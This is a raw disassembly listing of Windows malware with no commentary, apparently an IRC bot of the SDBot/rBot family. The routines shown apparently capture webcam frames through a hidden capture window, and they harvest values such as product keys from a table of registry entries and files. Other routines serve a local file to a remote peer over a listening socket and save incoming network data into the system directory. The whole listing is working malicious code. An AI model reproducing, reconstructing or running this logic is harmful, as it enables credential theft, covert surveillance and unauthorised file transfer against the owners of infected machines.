push edi
call dword_4441CC ; SendMessageA
loc_418237: ; CODE XREF: sub_4181B2+71�j
cmp [ebp+var_24], ebx
jz short loc_418213
push edi
call dword_444084 ; IsWindow
test eax, eax
mov edi, 42Ch
jz short loc_41825D
push ebx
push ebx
push edi
push [ebp+var_4]
call dword_4441CC ; SendMessageA
mov [ebp+Size], eax
jmp short loc_418260
; ---------------------------------------------------------------------------
loc_41825D: ; CODE XREF: sub_4181B2+98�j
mov [ebp+Size], ebx
loc_418260: ; CODE XREF: sub_4181B2+A9�j
push [ebp+Size] ; Size
call _malloc
cmp eax, ebx
pop ecx
mov [ebp+Src], eax
jz short loc_418213
push [ebp+Size] ; Size
call _malloc
mov esi, eax
cmp esi, ebx
pop ecx
jnz short loc_418287
xor ebx, ebx
inc ebx
jmp loc_41839B
; ---------------------------------------------------------------------------
loc_418287: ; CODE XREF: sub_4181B2+CB�j
push [ebp+var_4]
call dword_444084 ; IsWindow
test eax, eax
jz short loc_4182A4
push [ebp+Src]
push [ebp+Size]
push edi
push [ebp+var_4]
call dword_4441CC ; SendMessageA
loc_4182A4: ; CODE XREF: sub_4181B2+E0�j
push [ebp+Size] ; Size
push [ebp+Src] ; Src
push esi ; Dst
call _memcpy
mov ecx, [ebp+arg_8]
add esp, 0Ch
cmp ecx, ebx
jg short loc_4182BF
mov ecx, 280h
loc_4182BF: ; CODE XREF: sub_4181B2+106�j
mov eax, [ebp+arg_C]
cmp eax, ebx
jg short loc_4182CB
mov eax, 1E0h
loc_4182CB: ; CODE XREF: sub_4181B2+112�j
push [ebp+var_4]
mov [esi+4], ecx
mov [esi+8], eax
mov word ptr [esi+0Eh], 10h
mov [esi+14h], ebx
mov [esi+10h], ebx
mov [esi+20h], ebx
mov [esi+24h], ebx
mov word ptr [esi+0Ch], 1
mov [esi+28h], bl
mov [esi+29h], bl
mov [esi+2Ah], bl
mov [esi+2Bh], bl
call dword_444084 ; IsWindow
test eax, eax
mov edi, 42Dh
jz short loc_418315
push esi
push [ebp+Size]
push edi
push [ebp+var_4]
call dword_4441CC ; SendMessageA
loc_418315: ; CODE XREF: sub_4181B2+153�j
push [ebp+var_4]
call dword_444084 ; IsWindow
test eax, eax
jz short loc_418332
push ebx
push ebx
push 43Dh
push [ebp+var_4]
call dword_4441CC ; SendMessageA
loc_418332: ; CODE XREF: sub_4181B2+16E�j
push [ebp+var_4]
call dword_444084 ; IsWindow
test eax, eax
jz short loc_418351
push [ebp+arg_0]
push ebx
push 419h
push [ebp+var_4]
call dword_4441CC ; SendMessageA
loc_418351: ; CODE XREF: sub_4181B2+18B�j
push [ebp+var_4]
call dword_444084 ; IsWindow
test eax, eax
jz short loc_41836E
push [ebp+Src]
push [ebp+Size]
push edi
push [ebp+var_4]
call dword_4441CC ; SendMessageA
loc_41836E: ; CODE XREF: sub_4181B2+1AA�j
push [ebp+Src] ; Memory
call _free
push esi ; Memory
call _free
pop ecx
pop ecx
push [ebp+var_4]
call dword_444084 ; IsWindow
test eax, eax
jz short loc_41839B
push ebx
push ebx
push 40Bh
push [ebp+var_4]
call dword_4441CC ; SendMessageA
loc_41839B: ; CODE XREF: sub_4181B2+63�j
; sub_4181B2+D0�j ...
push [ebp+var_4]
call dword_4440F8 ; DestroyWindow
mov eax, ebx
loc_4183A6: ; CODE XREF: sub_4181B2+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_4181B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4183AB proc near ; CODE XREF: sub_40274D+7120�p
var_94 = byte ptr -94h
var_80 = dword ptr -80h
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
Src = dword ptr -8
Size = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 94h
push ebx
push esi
push edi
xor esi, esi
inc esi
push esi
push dword_4DA128
xor ebx, ebx
push 78h
push 0A0h
push ebx
push ebx
push 40000000h
push offset aWindow ; "Window"
call dword_444138
mov edi, eax
cmp edi, ebx
jnz short loc_4183E9
mov eax, esi
jmp loc_4185E5
; ---------------------------------------------------------------------------
loc_4183E9: ; CODE XREF: sub_4183AB+35�j
push edi
call dword_444084 ; IsWindow
test eax, eax
jz short loc_418406
push ebx
push [ebp+arg_4]
push 40Ah
push edi
call dword_4441CC ; SendMessageA
jmp short loc_418408
; ---------------------------------------------------------------------------
loc_418406: ; CODE XREF: sub_4183AB+47�j
xor eax, eax
loc_418408: ; CODE XREF: sub_4183AB+59�j
cmp eax, ebx
jnz short loc_418413
loc_41840C: ; CODE XREF: sub_4183AB+8B�j
; sub_4183AB+BC�j
mov ebx, esi
jmp loc_4185DC
; ---------------------------------------------------------------------------
loc_418413: ; CODE XREF: sub_4183AB+5F�j
push edi
call dword_444084 ; IsWindow
test eax, eax
jz short loc_418433
lea eax, [ebp+var_94]
push eax
push 2Ch
push 40Eh
push edi
call dword_4441CC ; SendMessageA
loc_418433: ; CODE XREF: sub_4183AB+71�j
cmp [ebp+var_80], ebx
jz short loc_41840C
push edi
call dword_444084 ; IsWindow
test eax, eax
jz short loc_418456
push ebx
push ebx
push 42Ch
push edi
call dword_4441CC ; SendMessageA
mov [ebp+Size], eax
jmp short loc_418459
; ---------------------------------------------------------------------------
loc_418456: ; CODE XREF: sub_4183AB+96�j
mov [ebp+Size], ebx
loc_418459: ; CODE XREF: sub_4183AB+A9�j
push [ebp+Size] ; Size
call _malloc
cmp eax, ebx
pop ecx
mov [ebp+Src], eax
jz short loc_41840C
push [ebp+Size] ; Size
call _malloc
mov esi, eax
cmp esi, ebx
pop ecx
jnz short loc_418480
xor ebx, ebx
inc ebx
jmp loc_4185DC
; ---------------------------------------------------------------------------
loc_418480: ; CODE XREF: sub_4183AB+CB�j
push edi
call dword_444084 ; IsWindow
test eax, eax
jz short loc_41849D
push [ebp+Src]
push [ebp+Size]
push 42Ch
push edi
call dword_4441CC ; SendMessageA
loc_41849D: ; CODE XREF: sub_4183AB+DE�j
push [ebp+Size] ; Size
push [ebp+Src] ; Src
push esi ; Dst
call _memcpy
mov ecx, [ebp+arg_C]
add esp, 0Ch
cmp ecx, ebx
jg short loc_4184B8
mov ecx, 0A0h
loc_4184B8: ; CODE XREF: sub_4183AB+106�j
mov eax, [ebp+arg_10]
cmp eax, ebx
jg short loc_4184C2
push 78h
pop eax
loc_4184C2: ; CODE XREF: sub_4183AB+112�j
push edi
mov [esi+4], ecx
mov [esi+8], eax
mov word ptr [esi+0Eh], 10h
mov [esi+14h], ebx
mov [esi+10h], ebx
mov [esi+20h], ebx
mov [esi+24h], ebx
mov word ptr [esi+0Ch], 1
mov [esi+28h], bl
mov [esi+29h], bl
mov [esi+2Ah], bl
mov [esi+2Bh], bl
call dword_444084 ; IsWindow
test eax, eax
jz short loc_418507
push esi
push [ebp+Size]
push 42Dh
push edi
call dword_4441CC ; SendMessageA
loc_418507: ; CODE XREF: sub_4183AB+14A�j
push edi
call dword_444084 ; IsWindow
test eax, eax
jz short loc_418524
lea eax, [ebp+var_68]
push eax
push 60h
push 441h
push edi
call dword_4441CC ; SendMessageA
loc_418524: ; CODE XREF: sub_4183AB+165�j
push edi
mov [ebp+var_64], ebx
mov [ebp+var_40], ebx
mov [ebp+var_3C], ebx
mov [ebp+var_38], ebx
mov [ebp+var_34], 1
mov [ebp+var_30], 5
mov [ebp+var_68], 1046Ah
call dword_444084 ; IsWindow
test eax, eax
jz short loc_418562
lea eax, [ebp+var_68]
push eax
push 60h
push 440h
push edi
call dword_4441CC ; SendMessageA
loc_418562: ; CODE XREF: sub_4183AB+1A3�j
push edi
call dword_444084 ; IsWindow
test eax, eax
jz short loc_41857D
push [ebp+arg_0]
push ebx
push 414h
push edi
call dword_4441CC ; SendMessageA
loc_41857D: ; CODE XREF: sub_4183AB+1C0�j
push edi
call dword_444084 ; IsWindow
test eax, eax
jz short loc_418596
push ebx
push ebx
push 43Eh
push edi
call dword_4441CC ; SendMessageA
loc_418596: ; CODE XREF: sub_4183AB+1DB�j
push edi
call dword_444084 ; IsWindow
test eax, eax
jz short loc_4185B3
push [ebp+Src]
push [ebp+Size]
push 42Dh
push edi
call dword_4441CC ; SendMessageA
loc_4185B3: ; CODE XREF: sub_4183AB+1F4�j
push [ebp+Src] ; Memory
call _free
push esi ; Memory
call _free
pop ecx
pop ecx
push edi
call dword_444084 ; IsWindow
test eax, eax
jz short loc_4185DC
push ebx
push ebx
push 40Bh
push edi
call dword_4441CC ; SendMessageA
loc_4185DC: ; CODE XREF: sub_4183AB+63�j
; sub_4183AB+D0�j ...
push edi
call dword_4440F8 ; DestroyWindow
mov eax, ebx
loc_4185E5: ; CODE XREF: sub_4183AB+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_4183AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4185EA proc near ; CODE XREF: sub_40274D+23F1�p
Dest = byte ptr -3F4h
var_2F0 = dword ptr -2F0h
var_F0 = byte ptr -0F0h
Str = byte ptr -70h
var_C = dword ptr -0Ch
File = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 3F4h
push ebx
xor ebx, ebx
cmp off_442A9C, ebx
mov [ebp+var_C], 80h
jz loc_418796
push esi
push edi
mov eax, offset off_442A9C
mov esi, offset dword_442AA8
mov edi, offset asc_436B94 ; "-"
loc_41861A: ; CODE XREF: sub_4185EA+1A4�j
lea ecx, [ebp+var_4]
push ecx
push 20019h
push ebx
push dword ptr [eax]
push dword ptr [esi-10h]
call dword_444238 ; RegOpenKeyExA
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_F0]
push eax
push ebx
push ebx
push dword ptr [esi-8]
push [ebp+var_4]
call dword_4440B8 ; RegQueryValueExA
test eax, eax
jnz loc_41877D
mov eax, [esi]
cmp eax, ebx
jz loc_418741
push eax
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+Dest]
push offset aSS_0 ; "%s\\%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
push offset aR ; "r"
push eax ; char *
call _fopen
add esp, 18h
cmp eax, ebx
mov [ebp+File], eax
jz loc_41877D
push eax
jmp short loc_4186AA
; ---------------------------------------------------------------------------
loc_418695: ; CODE XREF: sub_4185EA+D0�j
push dword ptr [esi+4] ; SubStr
lea eax, [ebp+Str]
push eax ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_4186BE
push [ebp+File] ; File
loc_4186AA: ; CODE XREF: sub_4185EA+A9�j
lea eax, [ebp+Str]
push 64h ; MaxCount
push eax ; Buf
call _fgets
add esp, 0Ch
test eax, eax
jnz short loc_418695
jmp short loc_418736
; ---------------------------------------------------------------------------
loc_4186BE: ; CODE XREF: sub_4185EA+BB�j
push 3Dh ; Val
push dword ptr [esi+4] ; Str
call _strchr
pop ecx
test eax, eax
pop ecx
lea eax, [ebp+Str]
jz short loc_4186FD
push offset asc_436B90 ; "="
push eax ; Str
call _strtok
push offset asc_436B90 ; "="
push ebx ; Str
call _strtok
push eax
push dword ptr [esi-4]
lea eax, [ebp+var_2F0]
push edi ; Format
push eax ; Dest
call _sprintf
add esp, 20h
jmp short loc_418711
; ---------------------------------------------------------------------------
loc_4186FD: ; CODE XREF: sub_4185EA+E5�j
push eax
push dword ptr [esi-4]
lea eax, [ebp+var_2F0]
push edi ; Format
push eax ; Dest
call _sprintf
add esp, 10h
loc_418711: ; CODE XREF: sub_4185EA+111�j
push ebx ; int
push [ebp+arg_8] ; int
lea eax, [ebp+var_2F0]
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_40123B
lea eax, [ebp+var_2F0]
push eax
call sub_417D70
add esp, 18h
loc_418736: ; CODE XREF: sub_4185EA+D2�j
push [ebp+File] ; File
call _fclose
pop ecx
jmp short loc_41877D
; ---------------------------------------------------------------------------
loc_418741: ; CODE XREF: sub_4185EA+6A�j
lea eax, [ebp+var_F0]
push eax
push dword ptr [esi-4]
lea eax, [ebp+var_2F0]
push edi ; Format
push eax ; Dest
call _sprintf
push ebx ; int
push [ebp+arg_8] ; int
lea eax, [ebp+var_2F0]
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_40123B
lea eax, [ebp+var_2F0]
push eax
call sub_417D70
add esp, 28h
loc_41877D: ; CODE XREF: sub_4185EA+60�j
; sub_4185EA+A2�j ...
push [ebp+var_4]
call dword_4441E8 ; RegCloseKey
add esi, 18h
lea eax, [esi-0Ch]
cmp [eax], ebx
jnz loc_41861A
pop edi
pop esi
loc_418796: ; CODE XREF: sub_4185EA+19�j
pop ebx
leave
retn
sub_4185EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame fpd=74h
sub_418799 proc near ; DATA XREF: sub_40274D+934�o
Dst = byte ptr -11B4h
var_1B4 = byte ptr -1B4h
var_1AC = byte ptr -1ACh
Str = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov eax, 11B4h
lea ebp, [esp-74h]
call __alloca_probe
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 6Dh
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_1B4]
rep movsd
push [ebp+74h+var_14]
xor edi, edi
inc edi
mov [eax+1B0h], edi
lea eax, [ebp+74h+var_1AC]
push eax
call sub_41A1C6
mov esi, eax
cmp esi, 0FFFFFFFFh
pop ecx
pop ecx
mov [ebp+74h+arg_0], esi
jnz short loc_41882D
lea eax, [ebp+74h+Dst]
push offset asc_436C10 ; "-"
push eax ; Dest
call _sprintf
xor ebx, ebx
cmp [ebp+74h+var_8], ebx
pop ecx
pop ecx
jnz short loc_418811
push ebx ; int
push [ebp+74h+var_C] ; int
lea eax, [ebp+74h+Dst]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push esi ; int
call sub_40123B
add esp, 14h
loc_418811: ; CODE XREF: sub_418799+5E�j
lea eax, [ebp+74h+Dst]
push eax
call sub_417D70
push [ebp+74h+var_10]
call sub_40B149
pop ecx
loc_418826: ; CODE XREF: sub_418799+F4�j
pop ecx
push edi
jmp loc_41894F
; ---------------------------------------------------------------------------
loc_41882D: ; CODE XREF: sub_418799+44�j
push offset byte_42B633
push esi
call sub_41C9D4
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jnz short loc_41888F
lea eax, [ebp+74h+Dst]
push offset asc_436BE0 ; "-"
push eax ; Dest
call _sprintf
xor ebx, ebx
cmp [ebp+74h+var_8], ebx
pop ecx
pop ecx
jnz short loc_418871
push ebx ; int
push [ebp+74h+var_C] ; int
lea eax, [ebp+74h+Dst]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push esi ; int
call sub_40123B
add esp, 14h
loc_418871: ; CODE XREF: sub_418799+BE�j
lea eax, [ebp+74h+Dst]
push eax
call sub_417D70
pop ecx
push esi
call dword_444218 ; closesocket
push [ebp+74h+var_10]
call sub_40B149
jmp short loc_418826
; ---------------------------------------------------------------------------
loc_41888F: ; CODE XREF: sub_418799+A4�j
mov edi, ds:dword_42B014
push 64h
call edi ; Sleep
mov esi, 1000h
xor ebx, ebx
jmp short loc_4188D6
; ---------------------------------------------------------------------------
loc_4188A2: ; CODE XREF: sub_418799+162�j
lea eax, [ebp+74h+Dst]
push offset asc_42CDD8 ; "\n"
push eax ; Dest
call _strcat
lea eax, [ebp+74h+Dst]
push eax ; Str
call sub_41C7BD
add esp, 0Ch
test eax, eax
jz short loc_4188FD
push 64h
call edi ; Sleep
push 0Ah
call sub_40B075
test eax, eax
pop ecx
jz short loc_4188FD
loc_4188D6: ; CODE XREF: sub_418799+107�j
push esi ; Size
lea eax, [ebp+74h+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push ebx
push esi
lea eax, [ebp+74h+Dst]
push eax
push [ebp+74h+arg_0]
call dword_444064 ; recv
test eax, eax
jg short loc_4188A2
loc_4188FD: ; CODE XREF: sub_418799+12B�j
; sub_418799+13B�j
lea eax, [ebp+74h+Dst]
push offset asc_436BAC ; "-"
push eax ; Dest
call _sprintf
cmp [ebp+74h+var_8], ebx
pop ecx
pop ecx
jnz short loc_41892F
push ebx ; int
push [ebp+74h+var_C] ; int
lea eax, [ebp+74h+Dst]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push [ebp+74h+arg_0] ; int
call sub_40123B
add esp, 14h
loc_41892F: ; CODE XREF: sub_418799+17A�j
lea eax, [ebp+74h+Dst]
push eax
call sub_417D70
pop ecx
push [ebp+74h+arg_0]
call dword_444218 ; closesocket
push [ebp+74h+var_10]
call sub_40B149
pop ecx
push ebx
loc_41894F: ; CODE XREF: sub_418799+8F�j
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_418799 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame fpd=74h
sub_418956 proc near ; DATA XREF: sub_40274D+7452�o
var_A04 = byte ptr -0A04h
var_604 = byte ptr -604h
var_500 = dword ptr -500h
var_4FC = dword ptr -4FCh
Dest = byte ptr -3FCh
var_1FC = dword ptr -1FCh
var_1F8 = dword ptr -1F8h
Str = byte ptr -1E0h
var_DC = byte ptr -0DCh
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
Dst = word ptr -30h
var_2E = dword ptr -2Eh
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0A04h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 6Dh
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_1FC]
rep movsd
xor esi, esi
xor ebx, ebx
push esi
inc ebx
push ebx
push 2
mov [eax+1B0h], ebx
mov [ebp+74h+var_10], esi
mov [ebp+74h+var_C], esi
mov [ebp+74h+var_20], esi
call dword_444100 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+74h+var_18], edi
jnz short loc_4189A6
push offset unk_436D10
jmp loc_418B59
; ---------------------------------------------------------------------------
loc_4189A6: ; CODE XREF: sub_418956+44�j
push 10h ; Size
lea eax, [ebp+74h+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push esi
mov [ebp+74h+Dst], 2
call dword_444260 ; htons
mov word ptr [ebp+74h+var_2E], ax
push 10h
lea eax, [ebp+74h+Dst]
push eax
push edi
mov [ebp+74h+var_2E+2], esi
call dword_4441E4 ; bind
test eax, eax
jz short loc_4189E4
push offset unk_436CEC
jmp loc_418B59
; ---------------------------------------------------------------------------
loc_4189E4: ; CODE XREF: sub_418956+82�j
lea eax, [ebp+74h+var_1C]
push eax
lea eax, [ebp+74h+Dst]
push eax
push edi
mov [ebp+74h+var_1C], 10h
call dword_444068 ; getsockname
push [ebp+74h+var_2E]
call dword_444200 ; htons
mov [ebp+74h+arg_0], esi
mov [ebp+74h+var_4], eax
lea eax, [ebp+74h+Str]
push eax ; Str
call _strlen
pop ecx
loc_418A16: ; CODE XREF: sub_418956+F1�j
mov ecx, [ebp+74h+arg_0]
mov al, [ebp+ecx+74h+Str]
cmp al, 20h
jnz short loc_418A29
push 5Fh
pop eax
jmp short loc_418A2C
; ---------------------------------------------------------------------------
loc_418A29: ; CODE XREF: sub_418956+CC�j
movsx eax, al
loc_418A2C: ; CODE XREF: sub_418956+D1�j
mov [ebp+ecx+74h+var_604], al
lea eax, [ebp+74h+Str]
inc ecx
push eax ; Str
mov [ebp+74h+arg_0], ecx
call _strlen
cmp [ebp+74h+arg_0], eax
pop ecx
jbe short loc_418A16
push ebx
push edi
call dword_444230 ; listen
test eax, eax
jz short loc_418A5F
push offset asc_436C10 ; "-"
jmp loc_418B59
; ---------------------------------------------------------------------------
loc_418A5F: ; CODE XREF: sub_418956+FD�j
push esi
push esi
push 3
push esi
push ebx
push 80000000h
lea eax, [ebp+74h+Str]
push eax
call ds:dword_42B08C ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+74h+var_8], eax
jnz short loc_418A89
push offset unk_436CCC
jmp loc_418B59
; ---------------------------------------------------------------------------
loc_418A89: ; CODE XREF: sub_418956+127�j
push esi
push eax
call ds:dword_42B0BC ; GetFileSize
push eax
mov [ebp+74h+arg_0], eax
movzx eax, word ptr [ebp+74h+var_4]
push eax
push [ebp+74h+var_1FC]
call sub_4023C9
pop ecx
push eax
call dword_44417C ; inet_addr
push eax
call dword_444234 ; htonl
push eax
lea eax, [ebp+74h+Str]
push eax
lea eax, [ebp+74h+Dest]
push offset dword_436CB4 ; Format
push eax ; Dest
call _sprintf
push esi ; int
push esi ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+var_DC]
push eax ; Str
push [ebp+74h+var_1FC] ; int
call sub_40123B
add esp, 2Ch
lea eax, [ebp+74h+var_38]
push eax
push esi
push esi
lea eax, [ebp+74h+var_500]
push eax
push esi
mov [ebp+74h+var_38], 3Ch
mov [ebp+74h+var_34], esi
mov [ebp+74h+var_4FC], edi
mov [ebp+74h+var_500], ebx
call dword_4441B0 ; select
test eax, eax
jg short loc_418B33
push esi ; int
push [ebp+74h+var_54] ; int
lea eax, [ebp+74h+var_DC]
push offset dword_436C9C ; int
push eax ; Str
push [ebp+74h+var_1FC] ; int
call sub_40123B
jmp loc_418C57
; ---------------------------------------------------------------------------
loc_418B33: ; CODE XREF: sub_418956+1BE�j
lea eax, [ebp+74h+var_14]
push eax
lea eax, [ebp+74h+var_48]
push eax
push edi
mov [ebp+74h+var_14], 10h
call dword_4440BC ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+74h+var_1F8], eax
jnz short loc_418B6C
push offset asc_436C78 ; "-"
loc_418B59: ; CODE XREF: sub_418956+4B�j
; sub_418956+89�j ...
lea eax, [ebp+74h+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp loc_418C5A
; ---------------------------------------------------------------------------
loc_418B6C: ; CODE XREF: sub_418956+1FC�j
push edi
call dword_444218 ; closesocket
cmp [ebp+74h+arg_0], esi
jz loc_418C1E
mov edi, 400h
loc_418B81: ; CODE XREF: sub_418956+2BF�j
mov eax, [ebp+74h+arg_0]
cmp eax, edi
mov [ebp+74h+var_4], edi
jge short loc_418B8E
mov [ebp+74h+var_4], eax
loc_418B8E: ; CODE XREF: sub_418956+233�j
push edi ; Size
lea eax, [ebp+74h+var_A04]
push esi ; Val
push eax ; Dst
call _memset
mov eax, [ebp+74h+arg_0]
add esp, 0Ch
push 2
push esi
neg eax
push eax
push [ebp+74h+var_8]
call ds:dword_42B0B8 ; SetFilePointer
push esi
lea eax, [ebp+74h+var_20]
push eax
push [ebp+74h+var_4]
lea eax, [ebp+74h+var_A04]
push eax
push [ebp+74h+var_8]
call ds:dword_42B080 ; ReadFile
push esi
push [ebp+74h+var_4]
lea eax, [ebp+74h+var_A04]
push eax
push [ebp+74h+var_1F8]
call dword_4441A0 ; send
mov [ebp+74h+var_4], eax
cdq
add [ebp+74h+var_10], eax
push esi
push edi
adc [ebp+74h+var_C], edx
lea eax, [ebp+74h+var_A04]
push eax
push [ebp+74h+var_1F8]
call dword_444064 ; recv
cmp eax, ebx
jl loc_418CB0
mov eax, [ebp+74h+var_4]
cmp eax, ebx
jl loc_418CB0
sub [ebp+74h+arg_0], eax
jnz loc_418B81
mov edi, [ebp+74h+var_18]
loc_418C1E: ; CODE XREF: sub_418956+220�j
push [ebp+74h+var_8]
call ds:dword_42B004 ; CloseHandle
push [ebp+74h+var_C]
push [ebp+74h+var_10]
call sub_419443
pop ecx
pop ecx
push eax
push [ebp+74h+var_44]
call dword_444188 ; inet_ntoa
push eax
lea eax, [ebp+74h+Str]
push eax
lea eax, [ebp+74h+Dest]
push offset asc_436C4C ; "-"
push eax ; Dest
call _sprintf
loc_418C57: ; CODE XREF: sub_418956+1D8�j
add esp, 14h
loc_418C5A: ; CODE XREF: sub_418956+211�j
cmp [ebp+74h+var_50], esi
jnz short loc_418C7C
push esi ; int
push [ebp+74h+var_54] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+var_DC]
push eax ; Str
push [ebp+74h+var_1FC] ; int
call sub_40123B
add esp, 14h
loc_418C7C: ; CODE XREF: sub_418956+307�j
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
cmp edi, esi
pop ecx
jbe short loc_418C94
push edi
call dword_444218 ; closesocket
loc_418C94: ; CODE XREF: sub_418956+335�j
push [ebp+74h+var_1F8]
call dword_444218 ; closesocket
push [ebp+74h+var_58]
call sub_40B149
pop ecx
push esi
loc_418CAA: ; CODE XREF: sub_418956+392�j
call ds:dword_42B068 ; ExitThread
loc_418CB0: ; CODE XREF: sub_418956+2AB�j
; sub_418956+2B6�j
push esi ; int
push [ebp+74h+var_54] ; int
mov esi, offset asc_436C34 ; "-"
push esi ; int
lea eax, [ebp+74h+var_DC]
push eax ; Str
push [ebp+74h+var_1FC] ; int
call sub_40123B
push esi
call sub_417D70
add esp, 18h
push [ebp+74h+var_1F8]
call dword_444218 ; closesocket
push [ebp+74h+var_58]
call sub_40B149
pop ecx
push ebx
jmp short loc_418CAA
sub_418956 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_418CEA proc near ; DATA XREF: sub_40274D+6FE�o
Dst = byte ptr -14C4h
var_4C4 = dword ptr -4C4h
Dest = byte ptr -2C4h
var_1C0 = dword ptr -1C0h
var_1B8 = byte ptr -1B8h
var_1A4 = byte ptr -1A4h
Str = byte ptr -0A0h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
File = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov eax, 14C4h
lea ebp, [esp-74h]
call __alloca_probe
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 6Dh
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_1C0]
rep movsd
xor esi, esi
inc esi
mov [eax+1B0h], esi
push 104h
lea eax, [ebp+74h+Dest]
xor ebx, ebx
push eax
mov [ebp+74h+var_8], ebx
call ds:dword_42B010 ; GetSystemDirectoryA
lea eax, [ebp+74h+var_1A4]
push eax
lea eax, [ebp+74h+Dest]
push eax
push offset aSS ; "%s%s"
push eax ; Dest
call _sprintf
add esp, 10h
push ebx
push 80h
push 2
push ebx
push esi
push 40000000h
lea eax, [ebp+74h+Dest]
push eax
call ds:dword_42B08C ; CreateFileA
cmp eax, 0FFFFFFFFh
jnz short loc_418D70
push offset unk_436DB0
jmp short loc_418DB6
; ---------------------------------------------------------------------------
loc_418D70: ; CODE XREF: sub_418CEA+7D�j
push eax
call ds:dword_42B004 ; CloseHandle
lea eax, [ebp+74h+Dest]
push offset aAB ; "a+b"
push eax ; char *
call _fopen
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+74h+File], eax
jnz short loc_418D98
push offset unk_436D80
jmp short loc_418DB6
; ---------------------------------------------------------------------------
loc_418D98: ; CODE XREF: sub_418CEA+A5�j
push [ebp+74h+var_20]
lea eax, [ebp+74h+var_1B8]
push eax
call sub_41A1C6
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
mov [ebp+74h+arg_0], eax
jnz short loc_418DC9
push offset asc_436D60 ; "-"
loc_418DB6: ; CODE XREF: sub_418CEA+84�j
; sub_418CEA+AC�j
lea eax, [ebp+74h+var_4C4]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp loc_418EBF
; ---------------------------------------------------------------------------
loc_418DC9: ; CODE XREF: sub_418CEA+C5�j
mov esi, 1000h
loc_418DCE: ; CODE XREF: sub_418CEA+14A�j
push esi ; Size
lea eax, [ebp+74h+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push ebx
push esi
lea eax, [ebp+74h+Dst]
push eax
push [ebp+74h+arg_0]
call dword_444064 ; recv
mov edi, eax
cmp edi, ebx
jz loc_418E91
cmp edi, 0FFFFFFFFh
jz short loc_418E36
push [ebp+74h+File] ; File
lea eax, [ebp+74h+Dst]
push edi ; Count
push 1 ; Size
push eax ; Str
call _fwrite
add [ebp+74h+var_8], edi
add esp, 10h
push [ebp+74h+var_8]
call dword_444234 ; htonl
push ebx
mov [ebp+74h+var_C], eax
push 4
lea eax, [ebp+74h+var_C]
push eax
push [ebp+74h+arg_0]
call dword_4441A0 ; send
jmp short loc_418DCE
; ---------------------------------------------------------------------------
loc_418E36: ; CODE XREF: sub_418CEA+114�j
lea eax, [ebp+74h+var_4C4]
push offset asc_436C34 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
push [ebp+74h+var_18] ; int
lea eax, [ebp+74h+var_4C4]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push [ebp+74h+var_1C0] ; int
call sub_40123B
lea eax, [ebp+74h+var_4C4]
push eax
call sub_417D70
push [ebp+74h+File] ; File
call _fclose
add esp, 24h
push [ebp+74h+arg_0]
call dword_444218 ; closesocket
push [ebp+74h+var_1C]
call sub_40B149
pop ecx
push 1
jmp loc_418F14
